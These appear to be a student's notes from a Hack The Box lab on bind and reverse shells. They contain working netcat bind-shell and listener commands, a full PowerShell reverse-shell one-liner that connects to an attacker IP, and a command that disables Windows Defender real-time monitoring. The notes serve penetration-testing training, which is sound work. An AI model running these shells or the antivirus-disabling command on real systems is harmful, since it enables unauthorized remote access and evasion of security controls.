1. Shell Validation
1) ps
yeon0815@htb[/htb]$ ps
PID TTY TIME CMD
4232 pts/1 00:00:00 bash
11435 pts/1 00:00:00 ps2) env
yeon0815@htb[/htb]$ env
SHELL=/bin/bash
2. Bind Shell
- The target system has a listener started and awaits a connection from a pentester's system
- Admins typically configure strict incoming firewall rules and NAT on the edge of the network (public-facing), so we would need to be on the internal network already.
- OS firewalls will likely block most incoming connections that aren't associated with trusted network-based applications.
1) Server - Binding a bash shell to the TCP session
- The code in our payloads will differ depending on the host operating system we are delivering it to.
Target@server:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
2) Client - Connecting to bind shell on target
yeon0815@htb[/htb]$ nc -nv 10.129.41.200 7777
Target@server:~$
3. Reverse Shells
- The attack box will have a listener running, and the target will need to initiate the connection
- It is likely that an admin will overlook outbound connections, giving us a better chance of going undetected.
1) Windows target
(1) Server (attack box)
yeon0815@htb[/htb]$ sudo nc -lvnp 443
Listening on 0.0.0.0 443- We may want to use common ports like this because when we initiate the connection to our listener, we want to ensure it does not get blocked going outbound through the OS firewall and at the network level.
- It would be rare to see any security team blocking 443 outbound since many applications and organizations rely on HTTPS to get to various websites throughout the workday.
(2) Client (target)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
(3) AV
At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent- The AV (Windows Defender Antivirus) software stopped the execution of the code.
(4) Disable AV
PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true
4. Introduction to Payloads
* FIFO named pipe file: Tool for IPC (Inter-process communication) in Linux environments, offering a straightforward way to transfer data between processes without relying on more complex mechanisms like sockets or shared memory.
- e.g., mkfifo /tmp/f;
